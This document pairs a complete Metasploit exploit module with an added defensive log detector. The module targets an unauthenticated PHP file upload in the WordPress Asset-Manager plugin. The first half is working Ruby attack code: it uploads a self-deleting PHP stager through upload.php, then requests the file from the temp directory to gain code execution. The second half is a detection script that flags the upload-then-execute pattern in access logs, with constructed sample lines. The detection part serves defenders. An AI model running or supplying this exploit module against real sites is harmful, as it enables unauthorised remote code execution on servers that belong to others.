This module, taken from the Metasploit exploit database, targets a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin's upload.php accepts PHP files: a user can upload a file into a temp directory without any authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    # Random .php filename; the PHP stager removes itself after running the payload
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # upload.php reads the uploaded file from the 'Filedata' multipart field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # A successful upload echoes the stored filename back in the response body
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The file lands in a web-accessible temp directory, so a plain GET executes it
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
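The module above leaves a very recognisable two-request pattern in the web server's access log: an unauthenticated POST to wp-content/plugins/asset-manager/upload.php followed shortly by a GET of a .php file under wp-content/uploads/assets/temp/. The following detector is an added example for defenders and is not part of the Metasploit module or of the plugin. It assumes the common Apache/nginx "combined" log format; the log lines, the IP addresses and the five-minute correlation window are constructed for illustration.

```ruby
# Added example (not from the Metasploit module above): flag the upload-then-execute
# pattern this exploit leaves in a combined-format access log.
require 'time'

# Request line of the unauthenticated upload, with a variable WordPress base path
UPLOAD_RE = %r{"POST (?<base>\S*?)/wp-content/plugins/asset-manager/upload\.php\S* HTTP/\d\.\d" (?<status>\d{3})}
# Request line fetching a .php file out of the plugin's web-accessible temp directory
EXEC_RE   = %r{"GET (?<base>\S*?)/wp-content/uploads/assets/temp/(?<file>[^/\s]+\.php)\S* HTTP/\d\.\d" (?<status>\d{3})}
# Combined log format prefix: client ip, ident, user, [timestamp], then the rest
LOG_RE    = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] (?<rest>.*)\z/

# Parse one access-log line; returns nil for lines that are not in combined format.
def parse_line(line)
  m = LOG_RE.match(line) or return nil
  { ip: m[:ip], ts: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'), rest: m[:rest] }
end

# Walk the log in order. Every GET of a .php file in the temp directory is reported;
# it is marked preceded_by_upload when the same client had a successful (HTTP 200)
# POST to upload.php within `window` seconds before it, i.e. the full exploit chain.
def detect_asset_manager_upload(lines, window: 300)
  uploads = Hash.new { |h, k| h[k] = [] } # client ip -> timestamps of 200 uploads
  hits = []
  lines.each do |line|
    e = parse_line(line) or next
    if (u = UPLOAD_RE.match(e[:rest]))
      uploads[e[:ip]] << e[:ts] if u[:status] == '200'
    elsif (x = EXEC_RE.match(e[:rest]))
      recent = uploads[e[:ip]].any? { |t| (e[:ts] - t).between?(0, window) }
      hits << { ip: e[:ip], file: x[:file], status: x[:status].to_i, preceded_by_upload: recent }
    end
  end
  hits
end

# Constructed sample log (documentation-range addresses); not captured from a real host.
SAMPLE_LOG = [
  '203.0.113.5 - - [26/May/2012:10:00:01 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 57 "-" "Mozilla/5.0"',
  '203.0.113.5 - - [26/May/2012:10:00:02 +0000] "GET /wordpress/wp-content/uploads/assets/temp/XkQpz.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [26/May/2012:10:05:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/photo.php HTTP/1.1" 404 120 "-" "curl/7.2"',
  '198.51.100.9 - - [26/May/2012:10:06:00 +0000] "GET /wordpress/index.php HTTP/1.1" 200 5000 "-" "Mozilla/5.0"',
]

if __FILE__ == $0
  detect_asset_manager_upload(SAMPLE_LOG).each { |h| puts h.inspect }
end
```

A hit with preceded_by_upload true and status 200 means the stager was both stored and executed, and the random five-letter name the module chooses will not be something a legitimate user uploaded; a lone GET that returned 404 is more likely a scanner probing for the directory. Because the module's PHP stager deletes itself (unlink_self), the log is often the only evidence left, which is why correlating on the client address rather than looking for the file on disk is the useful check here.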